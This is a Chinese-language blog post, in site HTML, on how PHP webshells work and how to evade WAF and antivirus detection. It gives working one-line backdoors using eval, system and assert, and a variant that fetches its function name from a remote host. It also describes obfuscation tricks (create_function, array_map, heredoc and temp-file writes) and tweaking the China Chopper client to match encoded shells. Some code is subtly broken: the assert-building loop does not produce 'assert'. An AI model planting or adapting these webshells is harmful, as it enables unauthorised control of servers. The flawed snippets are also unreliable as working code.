<!DOCTYPE html>
<html lang="zh-Hans">
    <!-- title -->




<!-- keywords -->




<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="author" content="Yokeen">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="Yokeen">
    
    <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    
    <meta name="description" content="无所畏惧，勇往直前">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <title>Webshell工作原理与免杀学习 · Yokeen&#39;s Blog</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href="/css/style.css?v=20180824" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link rel="stylesheet" href="/css/mobile.css?v=20180824" media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href="/assets/favicon.ico">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script">
    <link rel="preload" href="/scripts/main.js" as="script">
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin="">
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin="">
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
</head>

    
        <body class="post-body">
    
    
<header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/">Yokeen&#39;s Blog.</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">Webshell工作原理与免杀学习</a>
            </div>
    </div>
    
    <a class="home-link" href="/">Yokeen's Blog.</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style="







height:50vh;
">
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/post-bg.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            Webshell工作原理与免杀学习
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                    <div class="post-intro-tags">
    
        <a class="post-tag" href="javascript:void(0);" data-tags="Web安全">Web安全</a>
    
</div>
                
                
                    <div class="post-intro-read">
                        <span>字数统计: <span class="post-count word-count">1.6k</span>阅读时长: <span class="post-count reading-time">5 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2018/06/11</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    <span class="shareWrapper">
                        <span class="iconfont-archer shareIcon">&#xe71d;</span>
                        <span class="shareText">Share</span>
                        <ul class="shareList">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <hr>
<p>狐狸说：“对我来说，你只是一个小男孩，就像其他成千上万个小男孩一样没有什么两样。我不需要你。你也不需要我。对你来说，我也只是一只狐狸，和其他成千上万的狐狸没有什么不同。但是，如果你驯养了我，我们就会彼此需要。对我来说，你就是我的世界里独一无二的了；我对你来说，也是你的世界里的唯一了。”<br>                              —–《小王子》</p>
<hr>
<a id="more"></a>
<p>最近学习了一些Webshell相关的知识，来补充一下，这是一个大块，绕过的姿势千奇百怪，就算市面上出来的也有很多，还是好好学习。</p>
<h1 id="Webshell工作原理"><a href="#Webshell工作原理" class="headerlink" title="Webshell工作原理"></a>Webshell工作原理</h1><p>php常见的eval类型一句话木马<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;？php</span><br><span class="line">@<span class="keyword">eval</span>($_POST[value])</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>eval:将字符串按照PHP代码执行；<br>在这里进行了文件操作的演示，其原理就在于当前PHP脚本文件会去读取并执行变量值的内容。</p>
<h1 id="针对Webshell的免杀"><a href="#针对Webshell的免杀" class="headerlink" title="针对Webshell的免杀"></a>针对Webshell的免杀</h1><p><strong>如何针对市面上各种WAF而使Webshell做到免杀？</strong><br><strong><font color="red">对WAF查杀的规则</font></strong><br>1、上传文件时发现在文件内的敏感信息从而报毒查杀<br>2、创建好Webshell进行连接时发现其动作以及信息进行报毒查杀<br>3、….<br>大致的查杀规则就这两种，在这也针对这两种查杀规则来进行免杀学习<br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-11/50640640.jpg" alt=""><br>有的WAF检测到webshell不会显示文件。</p>
<h2 id="针对类型一的免杀demo编写"><a href="#针对类型一的免杀demo编写" class="headerlink" title="针对类型一的免杀demo编写"></a>针对类型一的免杀demo编写</h2><p>针对检测到文件中的敏感信息从而报毒查杀这一情况的免杀，也是最为常见的，在代码中进行多次加密以及其他逻辑方面的混淆变形来绕过WAF查杀规则。</p>
<p>先拿最常见的一句话进行测试，使用WAF对其进行扫描，毫无疑问被杀<br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-11/18775796.jpg" alt=""><br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-11/26973142.jpg" alt=""></p>
<p>通过利用一些PHP的函数对其进行变形（当然首要条件就是变形后此一句话依旧可以执行）<br>一、使用匿名函数进行创建<br>create_function(arg，code)<br>将执行的一句话代码作为函数的代码部分，并让其执行，因为不需要参数所以参数传入空，可以执行但是不幸被查杀，检测数create_function中所包含一句话木马。<br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-11/31043145.jpg" alt=""><br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-11/85210362.jpg" alt=""></p>
<p>这里来稍用点心思判断一下WAF的判断规则，WAF检测到a变量对应的create_function中所引入的变量对应是一句话，从而报毒查杀。</p>
<p>让a变量的值为字符串，字符串当然不会报错。但是也反应了WAF并没有那么智能，会检测里边的值进行回溯。<br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-11/34311972.jpg" alt=""></p>
<p>直接调用会出错，来尝试一下二次引用，看会不会查杀。<br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-11/96190692.jpg" alt=""></p>
<p>如果是在别的WAF下，提示信息会更详细一些，a变量指向了creat_function然后指向了一句话。</p>
<p>如何不以变量函数的形式来让其执行？<br>array_map(回调函数，数组)——————为数组的每个元素应用回调函数。<br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-11/92496599.jpg" alt=""><br>虽然还是提示create_function对应一句话，但是却没有了变量指向。</p>
<p>既然不会检测字符串中的值是否危险，就将payload完全变为一个字符串</p>
<p><strong><font color="red">定界符的使用</font></strong><br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&lt;&lt;&lt;EOF</span></span><br><span class="line"><span class="string">xxxxxx</span></span><br><span class="line">EOF;</span><br></pre></td></tr></table></figure></p>
<p>按照原样输出内部的东西，特殊字符不需要转义，但是变量会被解析（如果不让其解析需要对$进行转义）。</p>
<p><strong>此时的思路以及所使用的函数：</strong><br>让payload以字符串的方式被写入到某个目录，然后再在webshell中对其进行引用<br>tempnam(dir,prefix)————在指定目录建立一个具有唯一文件名的文件，可以指定其前缀<br>sys_get_temp_dir()————获取环境变量中的缓存目录<br>fopen————打开文件或url<br>fwrite————写入某个文件</p>
<p><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-11/36736269.jpg" alt=""><br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-11/85869344.jpg" alt=""><br>OK，这样就通过缓存目录做到了免杀的效果。</p>
<p>在PHP中也还有相当一部分的函数可以进行混淆与变形，这些还得不停地去学习。</p>
<p>接下来看一看针对类型二如何免杀。</p>
<h2 id="针对代码逻辑对连接工具进行微调"><a href="#针对代码逻辑对连接工具进行微调" class="headerlink" title="针对代码逻辑对连接工具进行微调"></a>针对代码逻辑对连接工具进行微调</h2><p>Webshell已经上传到目标站点，但是自己逻辑写的比较深，现阶段常用的工具（比如菜刀）并没有集成，导致工具连不了。</p>
<p>这里简单拿base64做演示学习。</p>
<p>正常代码，菜刀可连接并执行命令：<br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-11/27763498.jpg" alt=""><br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-11/53727387.jpg" alt=""></p>
<p>当我们写的时候对参数传入的值要用base64加密来进行一定的混淆绕过时：<br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-11/6256545.jpg" alt=""><br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-11/21900159.jpg" alt=""><br>执行不了，因为我们需要对传入的值进行base64加密，用fiddler抓一下菜刀发出去的包看一下里边的数据<br>执行ipconfig后传出去的值是这些<br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-11/64099899.jpg" alt=""><br>明显不是，细心的同学可能会发现里边有一串base64的值，其实拿出来就可以直接用了<br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-11/74376385.jpg" alt=""></p>
<p><strong><font color="red">在这我们对菜刀进行微调</font></strong><br>在菜刀的配置文件中发现PHP的base参数是%s，里边的值刚好就是菜刀所发出去的数据，其实里边已经进行了一定的绕过，不过是针对服务器WAF对所传入的值检测较为严格的情况下，这时WAF已经关闭，对于简单的情况反而兼容不了<br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-11/40008263.jpg" alt=""><br>将多余的数据删除，只留下一个%s<br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-11/70996515.jpg" alt=""></p>
<p>再次执行，正常<br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-11/44573835.jpg" alt=""></p>
<h1 id="其他类型"><a href="#其他类型" class="headerlink" title="其他类型"></a>其他类型</h1><h2 id="不出现eval、assert、system等关键字的免杀"><a href="#不出现eval、assert、system等关键字的免杀" class="headerlink" title="不出现eval、assert、system等关键字的免杀"></a>不出现eval、assert、system等关键字的免杀</h2><p>file_get_contents()————将整个文件读入字符串（可以为远程文件）<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$str = file_get_contents(<span class="string">"http://xxx.xxx.xxx.xxx/xxx.txt"</span>);</span><br><span class="line">$str($_REQUEST[<span class="string">'value'</span>]);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>目标txt文件的内容可以为eval、assert、system等</p>
<h2 id="利用system"><a href="#利用system" class="headerlink" title="利用system"></a>利用system</h2><p>上传普通的eval一句话安全狗会拦截，将eval改为system就可以绕过上传<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?</span> @system($_GET[<span class="string">'value'</span>]);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></p>
<h2 id="利用assert"><a href="#利用assert" class="headerlink" title="利用assert"></a>利用assert</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	$arr = <span class="keyword">array</span>(<span class="string">'a'</span>,<span class="string">'s'</span>,<span class="string">'s'</span>,<span class="string">'e'</span>,<span class="string">'r'</span>,<span class="string">'t'</span>);</span><br><span class="line">	$func = <span class="string">''</span>;</span><br><span class="line">	<span class="keyword">for</span>($i=<span class="number">0</span>;$i&lt;count($arr);$i++) &#123;</span><br><span class="line">		$func .= $func . $arr[$i];</span><br><span class="line">	&#125;</span><br><span class="line">	$func($_REQUEST[<span class="string">'c'</span>]);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<h1 id="其他webshell免杀技巧-更新"><a href="#其他webshell免杀技巧-更新" class="headerlink" title="其他webshell免杀技巧[更新]"></a>其他webshell免杀技巧[更新]</h1><h2 id="利用回调函数来创建后门"><a href="#利用回调函数来创建后门" class="headerlink" title="利用回调函数来创建后门"></a>利用回调函数来创建后门</h2><p>这两天在找资料中无意又翻到了P神的博客，又看到了不少干货，也没啥犹豫的加入了P神的小密圈，最近要花点时间把小密圈里边的东西好好看看。</p>
<h1 id="参阅文章"><a href="#参阅文章" class="headerlink" title="参阅文章"></a>参阅文章</h1><p><a href="https://www.bugbank.cn/live/view.html?id=109914" target="_blank" rel="noopener">漏洞银行：如何绕过WAF查杀规则–换向思维免杀webshell</a><br><a href="https://www.bugbank.cn/live/view.html?id=109307" target="_blank" rel="noopener">漏洞银行：安全狗上传 + webshell免杀</a><br><a href="https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html" target="_blank" rel="noopener">一些不包含数字和字母的webshell</a><br><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html" target="_blank" rel="noopener">创造tips的秘籍-PHP回调后门</a></p>

    </article>
    <!-- license  -->
    
        <div class="license-wrapper">
            <p>原文作者：<a href="http://yoursite.com">Yokeen</a>
            </p><p>原文链接：<a href="http://yoursite.com/2018/06/11/Webshell工作原理与免杀/">http://yoursite.com/2018/06/11/Webshell工作原理与免杀/</a>
            </p><p>发表日期：<a href="http://yoursite.com/2018/06/11/Webshell工作原理与免杀/">June 11th 2018, 2:50:27 pm</a>
            </p><p>更新日期：<a href="http://yoursite.com/2018/06/11/Webshell工作原理与免杀/">November 29th 2018, 9:33:26 pm</a>
            </p><p>版权声明：本文采用<a rel="license" href="http://creativecommons.org/licenses/by-nc/4.0/">知识共享署名-非商业性使用 4.0 国际许可协议</a>进行许可</p>
        </div>
    
    <!-- paginator  -->
    <ul class="post-paginator">
        <li class="next">
            
                <div class="nextSlogan">Next Post</div>
                <a href="/2018/06/12/Python-Fuzzing脚本编写学习/" title="Python Fuzzing脚本编写学习">
                    <div class="nextTitle">Python Fuzzing脚本编写学习</div>
                </a>
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href="/2018/04/27/nmap脚本编写初探/" title="nmap脚本编写初探">
                    <div class="prevTitle">nmap脚本编写初探</div>
                </a>
            
        </li>
    </ul>
    <!-- 评论插件 -->
    <!-- 来必力City版安装代码 -->

<!-- City版安装代码已完成 -->
    
    
    <!-- partial('_partial/comment/changyan') -->
    <!--PC版-->


    
    

    <!-- 评论 -->
</main>
            <!-- profile -->
            
        </div>
        <footer class="footer footer-unloaded">
    <!-- social  -->
    
    <div class="social">
        
    
        
            
                <a href="mailto:12345@qq.com" class="iconfont-archer email" title="email"></a>
            
        
    
        
            
                <a href="//github.com/yokeen" class="iconfont-archer github" target="_blank" title="github"></a>
            
        
    
        
            
                <span class="iconfont-archer wechat" title="wechat">
                  
                  <img class="profile-qr" src="/assets/1.png">
                </span>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    

    </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- 不蒜子  -->
    
    <div class="busuanzi-container">
    
     
    <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
    
    </div>
    
</footer>
    </div>
    <!-- toc -->
    
    <div class="toc-wrapper" style=
    







top:50vh;

    >
        <div class="toc-catalog">
            <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
        </div>
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Webshell工作原理"><span class="toc-number">1.</span> <span class="toc-text">Webshell工作原理</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#针对Webshell的免杀"><span class="toc-number">2.</span> <span class="toc-text">针对Webshell的免杀</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#针对类型一的免杀demo编写"><span class="toc-number">2.1.</span> <span class="toc-text">针对类型一的免杀demo编写</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#针对代码逻辑对连接工具进行微调"><span class="toc-number">2.2.</span> <span class="toc-text">针对代码逻辑对连接工具进行微调</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#其他类型"><span class="toc-number">3.</span> <span class="toc-text">其他类型</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#不出现eval、assert、system等关键字的免杀"><span class="toc-number">3.1.</span> <span class="toc-text">不出现eval、assert、system等关键字的免杀</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#利用system"><span class="toc-number">3.2.</span> <span class="toc-text">利用system</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#利用assert"><span class="toc-number">3.3.</span> <span class="toc-text">利用assert</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#其他webshell免杀技巧-更新"><span class="toc-number">4.</span> <span class="toc-text">其他webshell免杀技巧[更新]</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#利用回调函数来创建后门"><span class="toc-number">4.1.</span> <span class="toc-text">利用回调函数来创建后门</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#参阅文章"><span class="toc-number">5.</span> <span class="toc-text">参阅文章</span></a></li></ol>
    </div>
    
    <div class="back-top iconfont-archer">&#xe639;</div>
    <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
          <div class="sidebar-panel-archives">
    <!-- 在ejs中将archive按照时间排序 -->
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 40
        </div>
        <!-- search  -->
        
    </div>
    
    <div class="post-archive">
    
    
    
    
    <div class="archive-year"> 2019 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">06/17</span><a class="archive-post-title" href="/2019/06/17/DNS劫持与内网投毒/">DNS劫持与内网投毒</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/31</span><a class="archive-post-title" href="/2019/05/31/Tor组网搭建过程/">在PC以及路由器上的Tor组网搭建过程</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/25</span><a class="archive-post-title" href="/2019/05/25/毕业论文《基于机器学习的Web异常流量监测系统的设计与实现》/">毕业论文《基于机器学习的Web异常流量监测系统的设计与实现》</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/24</span><a class="archive-post-title" href="/2019/05/24/BadUSB制作与使用/">BadUSB制作与使用</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/24</span><a class="archive-post-title" href="/2019/05/24/Hi-im-back/">Hi,im back.</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2018 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
